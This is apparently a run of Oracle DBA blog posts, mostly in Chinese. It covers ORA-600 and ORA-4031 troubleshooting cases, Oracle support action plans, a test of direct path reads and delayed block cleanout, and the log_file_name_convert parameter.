.................
20 rows selected.

4.设置’no_filtering’ 提示,如:
with a as
(select distinct round(sum(x) over(order by n)) x,
round(sum(y) over(order by n)) y
from (select n,
cos(trunc(n / 20) * (1 – 1 / 5) * 3.1415926) * 2 x,
sin(trunc(n / 20) * (1 – 1 / 5) * 3.1415926) y
from (select rownum – 1 n from all_objects where rownum <= 20 * 5)))
select  /*+ no_filtering */ replace (sys_connect_by_path(point, ‘/’), ‘/’, null) star
from (select b.y, b.x, decode(a.x, null, ‘ ‘, ‘*’) point
from a,
(select *
from (select rownum – 1 + (select min(x) from a) x
from all_objects
where rownum <= (select max(x) – min(x) + 1 from a)),
(select rownum – 1 + (select min(y) from a) y
from all_objects
where rownum <= (select max(y) – min(y) + 1 from a))) b
where a.x(+) = b.x
and a.y(+) = b.y)
where x = (select max(x) from a)
start with x = (select min(x) from a)
connect by y = prior y and x = prior x + 1;

但是该hint在9.2.0.7版本中可能因为Bug 4752555 ‘Wrong results from CONNECT BY query’而导致返回错误行数;并且这是一个undocumented hint,所以强烈不推荐使用!

Rethink Migration, Another advertisement from db2

Once , in the land of Databasia,
there were two neighbouring communities
on either side of Migration Mountain.
There were so different in many ways.

In the town of DB2 ,everything ran smoothly & efficiently.
Townfolk feasted and were merry.

Over in the village of Orrible( i think this is the combination of oracle and terrible),
villagers toiled hard but never seemed to be happy,
struggling with crippling taxes & inferior tools.

Let us embark on a journey to find out why…………..

So another inferior advertisement from IBM,breaking oracle……….
So cool description of RAC!

ORA-600 internal error[kqrfrpo]一例

3月17日某客户主机上出现了文件系统空间不足的问题,经查发现是Oracle在1点左右产生了大量trace跟踪文件以致耗尽了磁盘空间,这些trace跟踪文件均是由Oracle服务进程遭遇错误“ORA-600: : internal error code, arguments: [kqrfrpo], [0x700000279FF98E0], [11], [], [], [], [], []”后在用户udump目录下所产生。

据客户工作人员称,在当时情况下(1点20分左右)以系统DBA权限本地方式登录数据库缓慢,而在1点25分时,登录缓慢现象消失,当时检查数据库,发现没有异常等待(如latch free等)和资源锁,数据库恢复正常。

Ora-600错误代码代表发生的错误是Oracle内部错误,一般是由于Oracle bug,操作系统bug或不当设置等问题引起的;具体发生的问题细节需要通过错误附加项来了解,本次错误中出现的第一位错误附加项是kqrfrpo。

通过METALINK相关文档我们发现ORA-600 kqrfrpo错误极有可能是Oracle 9i中的bug 3835429 OERI[kqrfrpo] / DB hang after killing a user process 所引起的,该bug跨越版本9.2.0.1.0至9.2.0.6.0,在版本9.2.0.7.0中得到了修正。

该bug的产生原因简述为,当一个用户进程在某个不恰当的时机被杀死,那么字典缓存latch可能无限期地被挂起,当其他进程无法获得该闩,则可能引起数据库级别的挂起(database wide hang)。

进一步分析ORA-600 kqrfrpo错误可能造成的影响,METALINK文档中就该错误可能造成影响的分类如下:
* 实例意外终止,即Oracle数据库crash(如pmon进程发生ora-600错误)
* 进程意外终止,在数据库层面表现为会话级的失败
* 内存块损坏
* 可能导致磁盘上的数据损坏
* 无任何影响

幸运的是,本次的ORA-600[kqrfrp]错误没有发生在数据库后台进程(pmon等)中,因此没有发生实例意外终止的现象,但出现登录数据库缓慢的现象,并且伴随用户进程因ora-600错误而异常中止。仔细观察600错误的trace文档可以发现,其中部分数据库服务进程的应用客户端为JDBC THIN CLIENT即java瘦客户端应用,若该类应用服务在活动情况下遭遇上述错误可能导致SQL执行出现问题,进而使得应用逻辑在数据库层面未得到实现。实际的情况仍需要得到应用方面的确认。

回顾该系统之前的情况,于3月16日夜间因通过cics连接的数据库服务进程遭遇ORA-600[4454]错误,在当时情况下无法在数据库级别杀死session,故在操作系统级别杀死了上述遭遇ORA-600[445]错误的服务进程;联系到以上情况,有可能是杀死进程触发了BUG,使得ORA-600[kqrfrpo]错误出现。从杀死用户进程到ora-600错误出现,期间跨越了4个小时。

针对ORA-600 kqrfrpo错误,因考虑到该错误是通过杀死用户服务进程的操作触发,故可以将之视为在特殊操作情况下才可能发生的隐性错误,实际数据库运行周期内需要杀死服务进程的情况并不常见,故该错误发生的概率较低。建议:
* 优先使用alter system kill session的命令来清除相关会话和进程
* 应用针对该bug的补丁3835429以彻底解决该问题。

直接路径读取对于延迟块清除的影响

在Oracle 11g版本中串行的全表扫描可能使用直接路径读取(direct path read)的方式取代之前版本中一直使用的DB FILE SCATTERED READ, 显然direct path read具备更多的优势:

1. 减少了对栓的使用,避免可能的栓争用

2.物理IO的大小不再取决于buffer_cache中所存在的块;试想某个8个块的extent中1,3,5,7号块在高速缓存中,而2,4,6,8块没有被缓存,传统的方式在读取该extent时将会是对2,4,6,8块进行4次db file sequential read,这是一种十分可怕的状况,其效率往往要比单次读取这个区间的所有8个块还要低得多,虽然Oracle为了避免这种情况总是尽可能的不缓存大表的块(读入后总是放在队列最冷的一端);而direct path read则可以完全避免这类问题,尽可能地单次读入更多的物理块。

当然直接路径读取也会引入一些缺点:

1.在直接路径读取某段前需要对该对象进行一次段级的检查点(A segment checkpoint).

2.可能导致重复的延迟块清除操作(我们假设你了解delayed block cleanout是什么).

metalink 文档[ID 793845.1] 对该新版本中的变化进行了描述:

Applies to:

Oracle Server – Enterprise Edition – Version: 11.1.0.6 to 11.1.0.7
This problem can occur on any platform.

Symptoms

After migrating an 11g database from a standalone to a 4-node RAC,  a noticeable
increase of 'direct path read' waits were observed at times.
Here are the Cache sizes and Top 5 events.
waits
Cache Sizes                       Begin        End
~~~~~~~~~~~                  ---------- ----------
               Buffer Cache:     3,232M     3,616M  Std Block Size:         8K
           Shared Pool Size:     6,736M     6,400M      Log Buffer:     8,824K
Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
DB CPU                                           13,916          42.1
direct path read                  1,637,344      13,359      8   40.4 User I/O
db file sequential read              47,132       1,111     24    3.4 User I/O
DFS lock handle                     301,278       1,028      3    3.1 Other
db file parallel read                14,724         554     38    1.7 User I/O

Changes

Migrated from a standalone database to a 4-node RAC.
Moved from Unix file system storage to ASM.

Using Automatic Shared Memory Management (ASMM).
The setting of db_cache_size in spfile/pfile is low compared to normal workload requirements.

Cause

There have been changes in 11g in the heuristics to choose between direct path reads or reads through buffer cache for serial table scans.
In 10g, serial table scans for “large” tables used to go through cache (by default) which is not the case anymore.  In 11g, this decision to read via direct path or through cache is based on the size of the table, buffer cache size and various other stats.
Direct path reads are faster than scattered reads and have less impact on other processes because they avoid latches.

Solution

When using Automatic Shared Memory Management (ASMM) and with buffer cache low limit set at a low end compared to the normal workload requirements and usually after startup, 11g might choose to do serial direct path read scans for large tables that do not fit in the SGA. When ASMM increases the buffer cache due to increased demand, 11g might not again do serial direct path read scans for these same large tables.  If you like to avoid this from happening, you should note the buffer cache and share pool requirements for a normal workload and set the low limits of buffer cache and shared pool in spfile/pfile close to these normal workload values.
db_cache_size
shared_pool_size

下面我们对直接路径读取对于延迟块清除造成的影响进行测试:

SQL> create table tv as select rownum rn,rpad('A',600,'Z') rp from dual
2       connect by level <=300000;
表已创建。
新建一个会话a:
SQL> set linesize 200 pagesize 1400;
SQL> select count(*) from tv;
COUNT(*)
----------
300000
SQL> select vm.sid, vs.name, vm.value
2    from v$mystat vm, v$sysstat vs
3   where vm.statistic# = vs.statistic#
4     and vs.name in ('cleanouts only - consistent read gets',
5                     'session logical reads',
6                     'physical reads',
7                     'physical reads direct');
SID NAME                                                                  VALUE
---------- ---------------------------------------------------------------- ----------
25 session logical reads                                          27281
25 physical reads                                                 27273
25 physical reads direct                                          27273         
25 cleanouts only - consistent read gets                            0
-- 显然查询采用了直接路径读取方式
SQL> update tv set rn=rn+1;                        -- 尝试批量更新
SQL> alter system flush buffer_cache;             
-- 刷新高速缓存,造成延迟块清除的情景,并提交
系统已更改。
SQL> commit;
提交完成。
新建一个会话b:
SQL> set linesize 200 pagesize 1400;
SQL> select count(*) from tv;
COUNT(*)
----------
300000
SQL> select vm.sid, vs.name, vm.value
2    from v$mystat vm, v$sysstat vs
3   where vm.statistic# = vs.statistic#
4     and vs.name in ('cleanouts only - consistent read gets',
5                     'session logical reads',
6                     'physical reads',
7                     'physical reads direct','redo size');
SID NAME                                                                  VALUE
---------- ---------------------------------------------------------------- ----------
25 session logical reads                                                 54554
25 physical reads                                                        27273
25 physical reads direct                                                 27273
25 redo size                                                                 0
25 cleanouts only - consistent read gets                           27273      
--查询采用direct path read时产生了延迟块清除操作,但不产生redo
SQL> select count(*) from tv;
COUNT(*)
----------
300000
SQL> select vm.sid, vs.name, vm.value
2    from v$mystat vm, v$sysstat vs
3   where vm.statistic# = vs.statistic#
4     and vs.name in ('cleanouts only - consistent read gets',
5                     'session logical reads',
6                     'physical reads',
7                     'physical reads direct','redo size');
SID NAME                                                                  VALUE
---------- ---------------------------------------------------------------- ----------
25 session logical reads                                                109104
25 physical reads                                                        54546
25 physical reads direct                                                 54546
25 redo size                                                                 0
25 cleanouts only - consistent read gets                                 54546

再次查询仍采用直接路径读取,产生了相同数目的延迟块清除操作,并没有产生redo;可见direct path read的清除操作仅是针对从磁盘上读取到PGA内存中的镜像,而不对实际的块做任何修改,因而也没有任何redo;

下面我们使用普通串行全表扫描方式,设置event 10949可以避免采用直接路径读取方式.关于该事件可以参见这里.

SQL> ALTER SESSION SET EVENTS '10949 TRACE NAME CONTEXT FOREVER';
会话已更改。
SQL> select count(*) from tv;
COUNT(*)
----------
300000
SQL> select vm.sid, vs.name, vm.value
2    from v$mystat vm, v$sysstat vs
3   where vm.statistic# = vs.statistic#
4     and vs.name in ('cleanouts only - consistent read gets',
5                     'session logical reads',
6                     'physical reads',
7                     'physical reads direct','redo size');
SID NAME                                                                  VALUE
---------- ---------------------------------------------------------------- ----------
25 session logical reads                                                163662
25 physical reads                                                        81819
25 physical reads direct                                                 54546
25 redo size                                                           1966560
25 cleanouts only - consistent read gets                                 81819
SQL> select count(*) from tv;
COUNT(*)
----------
300000
SQL> select vm.sid, vs.name, vm.value
2    from v$mystat vm, v$sysstat vs
3   where vm.statistic# = vs.statistic#
4     and vs.name in ('cleanouts only - consistent read gets',
5                     'session logical reads',
6                     'physical reads',
7                     'physical reads direct','redo size');
SID NAME                                                                  VALUE
---------- ---------------------------------------------------------------- ----------
25 session logical reads                                                190947
25 physical reads                                                        95673
25 physical reads direct                                                 54546
25 redo size                                                           1966560
25 cleanouts only - consistent read gets                                 81819

第一次采用普通全表扫描方式时产生了与direct path read时相同量的延迟块清除操作,并因此产生了大量的redo,这种模式回归到了最经典的延迟块清除情景中;之后的一次读取则不再需要清除块和产生重做了,我们在读取一个“干净”的表段。

从以上测试我们可以了解到,11g中使用更为广泛的direct path read方式对有需要延迟块清除操作的段所可能产生的影响,因为实际没有一个“修改块”的操作,所以虽然延迟块清除操作在该种模式下每次都必须产生,却实际没有产生脏块,因而也就不会有“写块”的必要,故而也没有redo的产生。所产生的负载可能更多的体现在cpu time的使用上。

ORA-00600 [KCBZPB_1], [59033077], [4], [1], [] example

below is the 600 entry in the alertlog:

alert.log:
Hex dump of Absolute File 14, Block 312821 in trace file /u01/ORAHOME/app/oracle/admin/TIGERS7/bdump/tigers7_dbw0_10999.trc
***
Corrupt block relative dba: 0x0384c5f5 (file 14, block 312821)
Bad header found during preparing block for write
Data in bad block -
type: 6 format: 1 rdba: 0x00000384
last change scn: 0xf90b.c5f55f7c seq: 0x9 flg: 0x72
consistency value in tail: 0x0001f90b
check value in block header: 0x102, block checksum disabled
spare1: 0x6, spare2: 0x2, spare3: 0x0
***
Thu Apr 16 18:32:48 2009
Errors in file /u01/ORAHOME/app/oracle/admin/TIGERS7/bdump/tigers7_dbw0_10999.trc:
ORA-00600: internal error code, arguments: [kcbzpb_1], [59033077], [4], [1], [], [], [], []
Thu Apr 16 18:32:49 2009
Errors in file /u01/ORAHOME/app/oracle/admin/TIGERS7/bdump/tigers7_dbw0_10999.trc:
ORA-00600: internal error code, arguments: [kcbzpb_1], [59033077], [4], [1], [], [], [], []
DBW0: terminating instance due to error 600
Instance terminated by DBW0, pid = 10999
Thu Apr 16 19:04:58 2009

After that, We have executed dbverify against the identified file and it produced no errors:

DBVERIFY: Release 9.2.0.8.0 - Production on Thu Apr 16 19:31:32 2009
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
DBVERIFY - Verification starting : FILE = /u32/ORAINDX/oradata/TIGERS7/indx01.dbf
DBVERIFY - Verification complete
Total Pages Examined : 1280000
Total Pages Processed (Data) : 0
Total Pages Failing (Data) : 0
Total Pages Processed (Index): 1262823
Total Pages Failing (Index): 0
Total Pages Processed (Other): 8751
Total Pages Processed (Seg) : 0
Total Pages Failing (Seg) : 0
Total Pages Empty : 8426
Total Pages Marked Corrupt : 0
Total Pages Influx : 0
Highest block SCN : 10386833124905 (2418.1602203177)

we do open a sr ,and oracle support suggest to do below query:
ACTION PLAN
===========
1) please describe the sequence of events leading up to the problem

2) please upload the alert.log. ZIP if >2MB. Dot not use RAR.

3) please describe your backup strategy:
a) when was your last valid backup?
b) are you using RMAN to perform this backup?
c) do you have all archivelogs from the last backup to now?
d) was this a hot or cold backup?

4) even if you’re not using RMAN, run the following in RMAN:
$ rman target /
RMAN> backup validate check logical database;

5) Once RMAN validate is completed, run the following in SQL*Plus as SYSDBA:
SQL> select * from v$database_block_corruption;

6) Please run the following query in SQL*Plus as SYSDBA
— db must be in either MOUNT or OPEN mode
— Save the queries to a file, eg. rec_query1.sql, then run it in SQL*Plus
—————– start ——————
set echo on
set pagesize 2000 linesize 200 trimspool on
col name form a60
col status form a10
col dbname form a15
col member form a60
col inst_id form 999
col resetlogs_time form a25
col created form a25
col DB_UNIQUE_NAME form a15
col stat form 9999999999
col thr form 99999
col “Uptime” form a80

spool rec_query1.out
show user
alter session set nls_date_format=’DD-MM-RR hh24:mi:ss’;

select inst_id, instance_name, status,
to_char(STARTUP_TIME,’dd-Mon-yyyy hh24:mi’) || ‘ – ‘ ||
trunc(SYSDATE-(STARTUP_TIME) ) || ‘ day(s), ‘ ||
trunc(24*((SYSDATE-STARTUP_TIME) – trunc(SYSDATE-STARTUP_TIME)))||’ hour(s), ‘ ||
mod(trunc(1440*((SYSDATE-STARTUP_TIME) – trunc(SYSDATE-STARTUP_TIME))), 60) ||’ minute(s), ‘ ||
mod(trunc(86400*((SYSDATE-STARTUP_TIME) – trunc(SYSDATE-STARTUP_TIME))), 60) ||’ seconds’
“Uptime”
from gv$instance
order by inst_id
/

select dbid, name dbname, open_mode, database_role,
to_char(created,’dd-Mon-YYYY hh24:mi:ss’) created,
to_char(resetlogs_time,’dd-Mon-YYYY hh24:mi:ss’) resetlogs_time
from v$database;

archive log list;

select count(*) from v$backup where status = ‘ACTIVE’;

select * from v$log;
select * from v$logfile;
select * from v$recover_file order by 1;

select distinct(status)from v$datafile;
select FILE#,TS# , status, NAME from v$datafile
where status not in (‘SYSTEM’,’ONLINE’)
order by 1;

select fhsta, count(*)
from X$KCVFH group by fhsta;

select min(fhrba_Seq), max(fhrba_Seq)
from X$KCVFH;
select hxfil FILE#,fhsta STAT,fhscn SCN,
fhthr thr, fhrba_Seq SEQUENCE,fhtnm TABLESPACE
from x$kcvfh order by 1;

7) dump the block. Run the following as SYSDBA in SQL*Plus:
SQL> alter session set max_dump_file_size=unlimited;
SQL> oradebug setmypid;
SQL> alter system dump datafile ‘full pathname for file 14’ block 312821;
SQL> oradebug tracefile_name;

==> upload the said trace file

8) run dbv against datafile 14:
$ dbv file= logfile=

spool off
—————– end ——————

RESEARCH
===============
ORA-600 [4519] “Block Corruption Detected – Cache type wrong”
We found a corrupted block when trying to read a block using
consistent read. An invalid block type was found.
Possible Block Corruption in Memory.

ORA-600 [kcbzpb_1] A block has been read cleanly from disk and updated successfully by the
clients of the cache layer.
Before the cache layer writes the block back to disk it does a health
check on the cache header.
If requested to do so (default), it generates a checksum for the block.
The health check is failing.
MEMORY CORRUPTION

ORA-600 [kcbzpb_1] was raised because DBA 59033077 => 14,312821 was found corrupted when read in the cache before we writ eit to disk.
Alert.log shows same block as corrupted, BAD HEADER, meaning blocks was overwriten.
Now DBV doesn’t show any corruption in file 14.

ACTION PLAN
====================

Hi,

I reviewed the information and the crash was caused by in memory corruption.
If restarted your database should be fine.

RESEARCH
================
Db crashed with ORA-600 [KCBZPB_1] because of corrupted block in memory:

STACK: kcbbxsv kcbbwlru kcbbdrv ksbabs ksbrdp

Bug.5866883/5845232 (36) INSTANCE GOES DOWN DUE TO ORA-600 [KCBZPB_1] V9208:
Bug.5845843/5845232 (96) DATABASE CRASH BY ORA-00600 [2032] , ORA-00600 [KCBZPB_1]

Bug:5845232: Block corruption / errors from concurrent dequeue operations
Tags: AQ CORR/PHY DUMP OERI R9208 REGRESSION SUPERCEEDED
Details:
This problem is introduced in 9.2.0.8 by the fix for bug 4144683.
Concurrent dequeue operations can lead to block corruption
/ memory corruption with varying symptoms such as ORA-600 [6033],
ORA-600 [6101] and ORA-600 [kcoapl_blkchk] if DB_BLOCK_CHECKING is enabled.
The fix for this bug is Patch 6401576.

Bug:6401576 ORA-600 [KTBAIR1] / ORA-600 [KCBZPB_1] / CORRUPTION MESSAGES –> DB CRASH
Abstract: OERI[ktbair1] / ORA-600 [6101] index corruption possible
Fixed-Releases: WIN:9208P22
Tags: CORR/IND OERI
Details:
Note: This fix replaces the fix in bug 5845232.
Certain index operations can lead to block corruption
/ memory corruption with varying symptoms such as ORA-600 [6033],
ORA-600 [6101] , ORA-600 [ktbair1] , ORA-600 [kcbzpb_1],
ORA-600 [4519] and ORA-600 [kcoapl_blkchk] if DB_BLOCK_CHECKING is enabled.

ISSUE CLARIFICATION
====================
Db crashed with ORA-600 [KCBZPB_1]

ISSUE VERIFICATION
===================
alert.log and trace file

CAUSE DETERMINATION
======================
in memory corruption

CAUSE JUSTIFICATION
====================
Bug:6401576 ORA-600 [KTBAIR1] / ORA-600 [KCBZPB_1] / CORRUPTION MESSAGES –> DB CRASH

POTENTIAL SOLUTION(S)
======================
apply patch for Bug:6401576

POTENTIAL SOLUTION JUSTIFICATION(S)
====================================
to fi x the issue

SOLUTION / ACTION PLAN
=======================

Hi,

These errors looks very similar to Bug:6401576 ORA-600 [KTBAIR1] / ORA-600 [KCBZPB_1] / CORRUPTION MESSAGES –> DB CRASH

Please download and apply one-off patch for Bug:6401576 from

Metalink->Patches->patch#=6401576 ->Platform=Hp_UX

Thanks, Rodica

关于参数log_file_name_convert

Oracle文档对于该参数的描述十分容易产生歧义:converts the filename of a new log file on the primary database to the filename of a log file on the standby database,有时被误解为归档日志的文件名转换。
如在某standby备库进行以下测试:

alter system set log_file_name_convert='orcl','ZZZZZZ' scope=spfile;
SQL> select fnnam,fnonm from x$kccfn;
FNNAM
--------------------------------------------------------------------------------
FNONM
--------------------------------------------------------------------------------
/u01/oradata/ZZZZZZ/redo03.log
/u01/oradata/orcl/redo03.log
/u01/oradata/ZZZZZZ/redo02.log
/u01/oradata/orcl/redo02.log
/u01/oradata/ZZZZZZ/redo01.log
/u01/oradata/orcl/redo01.log
alter system set log_file_name_convert='orcl','8888888' scope=spfile;
SQL> select fnnam,fnonm from x$kccfn;
FNNAM
--------------------------------------------------------------------------------
FNONM
--------------------------------------------------------------------------------
/u01/oradata/8888888/redo03.log
/u01/oradata/orcl/redo03.log
/u01/oradata/8888888/redo02.log
/u01/oradata/orcl/redo02.log
/u01/oradata/8888888/redo01.log
/u01/oradata/orcl/redo01.log

v$datafile中的大部分信息来源于x$kccfn内部视图,kccfn意为[F]ile [N]ames来源于Controlfile,其中 fnnam为经过对controlfile中文件名记录转制(由db_file_name_convert或 log_file_name_convert等参数convert)后的记录,而fnonm为控制文件中的原始文件名(或曰文件路径)。若在Data Guard配置过程中遭遇到日志文件名或数据文件名的转制问题,可以通过查询该视图进一步分析。

author: maclean
permanent link:https://www.askmaclean.com/2010/05/31/%E5%85%B3%E4%BA%8E%E5%8F%82%E6%95%B0log_file_name_convert/
date:2010-05-31
All rights reserved.

ORA-00600 [kcbz_check_objd_typ_3]错误一例

5月26日凌晨某客户实例警告日志中出现”ORA-00600: internal error code, arguments: [kcbz_check_objd_typ_3], [0], [0], [1], [], [], [], []“,经过分析发现与之前CR实例发生的600错误情况症状相同。

从跟踪文件m1_m0001_4209.trc中可以看到当时的执行的SQL语句,如附件。

PL/SQL的调用堆栈为:

—– PL/SQL Call Stack —–

object      line  object

handle    number  name

3f3e89300        10  package body SYS.PRVT_HDM

3f5e9d3d8        16  SYS.WRI$_ADV_HDM_T

3f3f90898      1535  package body SYS.PRVT_ADVISOR

3f3f90898      1618  package body SYS.PRVT_ADVISOR

3f3e89300       106  package body SYS.PRVT_HDM

3eb69a3f8         1  anonymous block

函数调用堆栈为:

kgerinv kgeasnmierr kcbassertbd3 kcbz_check_objd_typ kcbzib kcbgtcr ktrget kdsgrp kdsfbr qertbFetchByRowid rwsfcd…….

以上信息与metalink Bug 4430244 中的描述完全一致,原因为Segment advisor的代码错误的将已被drop的对象数据块加载到缓存区中,导致后续的操作出现错误。

通过之前的调查已明确当前系统中已应用过Bug 4430244的补丁,认为可能是ORACLE没有解决但存在的未知BUG,或者是以前 提供的4430244补丁存在缺陷,原因如下:

1. 已确定目前所应用的小补丁没有冲突,即各小补丁所实现的功 能不受影响;

2. 当前数据库系统已经使用了与本次错误信息完全符合的bug 4430244的小补丁;

3. 当相关的小补丁都应用之后,在metalink上仍有客户提交完全相同的错误(详见bug 7032704和bug 6818725)。

4. 本次错误相关的数据块与以前(2008年7月)出现的不一致,因此不是物理存储上的损坏。

5. 本次错误与Bug 6388743 “ORA-00600 [KCBZ_CHECK_OBJD_TYP_3],[0],[0],[1],[],[],[],[] OCCURRED”中的描述完全一致,ORACLE猜测是但没有确定是BUG 4430244, 只是建议使用4430244的小补丁或10.2.0.4的补丁包, 最后此bug以客户应用10.2.0.4补丁包而被视 为结束。真实原因不明。

Metalink在之前该实例出现错误的SR提出以下解决方法:

1. 在RAC的所有实例中冲 刷buffer_cache

使用命令刷数据缓存区后,会使缓存区的数据块都标记为free,即以前缓存的数据都被移出内存。影响主要是在一段时间内使物理读增加,因 此建议在业务空闲时段操作,避免在刷缓存的同时有高负载应用在申请缓存空间。该方法可临时防止相关错误抛出。

2. 停用Segment advisor job

该job相关功能是进行 对象段(如表,索引等)的存储空间状态收集,识别 是否适合根据其可用空间大小进行收缩,并提供建议,例如是否存在较大的浪费空间,表的高水位线是否太高,是否需要进行表的回缩等。如 不需要或不关心对象段的存储空间状态,可不做相关操作。该方法可以长远解决问题的发生。

3. 升级数据库版本至10.2.0.4

author: maclean
permanent link:https://www.askmaclean.com/2010/05/31/ora-00600-kcbz_check_objd_typ_3%E9%94%99%E8%AF%AF%E4%B8%80%E4%BE%8B/
date:2010-05-31
All rights reserved.

ora-4031 and "obj stat memory" component in Shared Pool

My customer has an application which using a lots of “temporary” table. They create so many tables but only operate once.And they are using automatic SGA management,all this cause large memory usage in shared pool, especially the “obj stat memo”.
Recently they encountered  the error 4031 , there are still 1G space available in shared pool, so i believe the root cause is too many obj stat fragment .
Verified the issue in the log file as noted below:
LOG FILE
-----------------------
Filename  =gpnms4_j000_22234.trc.log
See the following error:
***  2010-05-22 21:47:37.388
ORA-12012: error on auto execute of job 2
ORA-04031:  unable to allocate 4064 bytes of shared memory ("shared pool","select  SYSDATE+(30 / (24*60)...","sga heap(4,0)","kglsim heap")
***  2010-05-22 21:47:37.410
ORA-00604: error occurred at recursive SQL  level 1
ORA-04031: unable to allocate 4064 bytes of shared memory  ("shared pool","select sysdate+(64)/(24*60) ...","sga heap(6,0)","kglsim  heap")
ORA-12012: error on auto execute of job 2
ORA-04031:  unable to allocate 4064 bytes of shared memory ("shared pool","select  SYSDATE+(30 / (24*60)...","sga heap(4,0)","kglsim heap")
4031 specified trace as noted below:

TRACE FILE gpnms4_j000_22234.trc

------------
*** SERVICE  NAME:(SYS$USERS) 2010-05-22 21:47:37.240
*** SESSION ID:(121.20137)  2010-05-22 21:47:37.240
*** 2010-05-22 21:47:37.240
=================================
Begin  4031 Diagnostic Information
=================================
The  following information assists Oracle in diagnosing
causes of  ORA-4031 errors.  This trace may be disabled
by setting the init.ora  _4031_dump_bitvec = 0
=====================================
Allocation  Request Summary Informaton
=====================================
Current  information setting:  04014fff
SGA Heap Dump Interval=3600 seconds
Dump Interval=300 seconds
Last Dump Time=05/22/2010 21:47:37
Dump Count=1
Allocation request for:      kglsim heap
Heap:  380048e48, size: 4064
******************************************************
HEAP  DUMP heap name="sga heap(4,0)"  desc=380048e48
extent sz=0xfe0  alt=216 het=32767 rec=9 flg=-125 opc=2
parent=0 owner=0 nex=0  xsz=0x1000000
latch set 4 of 6
durations enabled for this heap
reserved granules for root 0 (granule size 16777216)
====================
Process  State Object
====================
----------------------------------------
SO:  5761a3750, type: 2, owner: 0, flag: INIT/-/-/0x00
(process) Oracle  pid=37, calls cur/top: 56e79bdc8/572cd9160, flag: (0) -
int error: 0, call error: 0, sess error: 0, txn error 0
(post info)  last post received: 1359 0 4
last post  received-location: kslpsr
last process to post me:  57f156848 1 6
last post sent: 0 0 24
last post sent-location: ksasnd
last process posted by  me: 57f156848 1 6
(latch info) wait_event=0 bits=60
holding     (efd=19) 5731bf3a0 Child shared pool sim alloc level=6 child#=12
Location from where latch is held: kglsim_chk_heaplist: alloc:
Context saved from call: 0
state=busy, wlstate=free
holding    (efd=19) 5711d3de0 Child library cache level=5 child#=15
Location from where latch is held: kglobpn: child:: latch
Context saved from call: 22
state=busy, wlstate=free
Process Group: DEFAULT, pseudo proc: 57416ad08
O/S info:  user: oracle, term: UNKNOWN, ospid: 22234
OSD pid info: Unix  process pid: 22234, image: oracle@SHUDBa1 (J000)
SO:  5761d48b0, type: 4, owner: 5761a3750, flag: INIT/-/-/0x00
(session)  sid: 121 trans: 0, creator: 5761a3750, flag: (40000041) USR/-  BSY/-/-/-/-/-
DID: 0001-0025-0060BC7E, short-term DID:  0000-0000-00000000
txn branch: 0
oct: 0,  prv: 0, sql: 0, psql: 0, user: 93/WUBIAO
O/S info: user: oracle,  term: UNKNOWN, ospid: 22234, machine: SHUDBa1
program:  oracle@SHUDBa1 (J000)
last wait for 'SGA: allocation forcing  component growth' blocking sess=0x0 seq=2 wait_time=10349 seconds since  wait started=0
=0, =0, =0
Dumping Session Wait History
for 'SGA: allocation forcing component growth' count=1  wait_time=10349
=0, =0, =0
for 'db file sequential  read' count=1 wait_time=89
file#=7, block#=6f767, blocks=1
temporary object counter: 0
----- Call Stack Trace -----
ksm_4031_dump  <- ksmasg <- kghnospc <- kghalo <- kglsim_chk_heaplist
<- kglsim_upd_newhp <- 3076 <- kglUpdateSimulator <-  kglobpn <- kglpim
<- qcdlgtd <- qcsfplob <-  qcsprfro <- qcsprfro_tree <- qcsprfro_tree
<-  qcspafq <- qcspqbDescendents <- qcspqb <- kkmdrv <- opiSem
<- opiprs <- kksParseChildCursor <- rpiswu2 <-  kksLoadChild <- kxsGetRuntimeLock
<- kksfbc <-  kkspsc0 <- kksParseCursor <- opiosq0 <- opiodr
<- rpidrus <- skgmstack <- rpidru <- rpiswu2 <- rpidrv
<- rpisplu <- rpispl <- kkjfnd <- kkjex1e  <- kkjsexe
<- kkjrdp <- opirip <- opidrv  <- sou2o <- opimai_real
<- main
==============================
Memory  Utilization of Subpool 1
================================
Allocation Name          Size
_________________________   __________
"free memory              "   390197664
"obj stat  memo            "   403349328
"KGH: NO ACCESS           "     16695456
==============================
Memory Utilization  of Subpool 2
================================
Allocation Name           Size
_________________________  __________
"free  memory              "   319286368
"obj stat memo            "    380580336
"KGH: NO ACCESS           "    16728160
==============================
Memory  Utilization of Subpool 3
================================
Allocation Name          Size
_________________________   __________
"free memory              "   325262592
"obj stat  memo            "   351782568
"KGH: NO ACCESS           "     16728160
==============================
Memory Utilization  of Subpool 4
================================
Allocation Name           Size
_________________________  __________
"free  memory              "   556035112
"obj stat memo            "    551594016
"KGH: NO ACCESS           "    32394336
==============================
Memory  Utilization of Subpool 5
================================
Allocation Name          Size
_________________________   __________
"free memory              "   577033336
"obj stat  memo            "   432672408
"KGH: NO ACCESS           "     16736320
==============================
Memory Utilization  of Subpool 6
================================
Allocation Name           Size
_________________________  __________
"free  memory              "   333050648
"obj stat memo            "    406731024
"KGH: NO ACCESS           "    16719968
LIBRARY  CACHE STATISTICS:
namespace           gets hit ratio      pins hit  ratio    reloads   invalids
-------------- --------- ---------  --------- --------- ---------- ----------
CRSR           2214572558      0.355 3977649054     0.403   81251674   34891116
TABL             69900473     0.844 438948912     0.885   11952398          0
BODY              1126452     0.970  86610514     0.999      50956          0
TRGR            104735463     0.994 156443548     0.994     369130          0
INDX             23588405     0.667  47086339     0.801    1478850          0
CLST              2746262     0.997   4303977     0.994      15628          0
At first, i think this “obj stat memory”  subheap can be cleaned up by flush shared pool, but i ‘m wrong ; The component is permanent in shared pool.
SQL>  select  * from v$sgastat where name='obj stat memo';
POOL         NAME                            BYTES
------------ -------------------------- ----------
shared pool  obj stat memo                 1454448
SQL> alter system flush shared_pool;
System altered.
SQL> select  * from v$sgastat where name='obj stat memo';
POOL         NAME                            BYTES
------------ -------------------------- ----------
shared pool  obj stat memo                 1454448
After that I  read the metalink note “Bug 5573238  Shared pool memory use / ORA-4031 due to “obj stat memo” in one subpool”, oracle support advise to workaround this problem by setting STATISTICS_LEVEL=BASIC or “_object_statistics”=false. But STATISTICS_LEVEL=BASIC will disable many automatic features like ASMM, Automatic statistics gathering;If you set “_object_statistics”=false, then as  _object_statistics control the population of segment stats in the v$segstat andv$segment_statistics views. So setting this to false will result in no data populating these v$views.Both the parameters will require a database restart.
And i have opened a new tar , the oracle support advise as below:

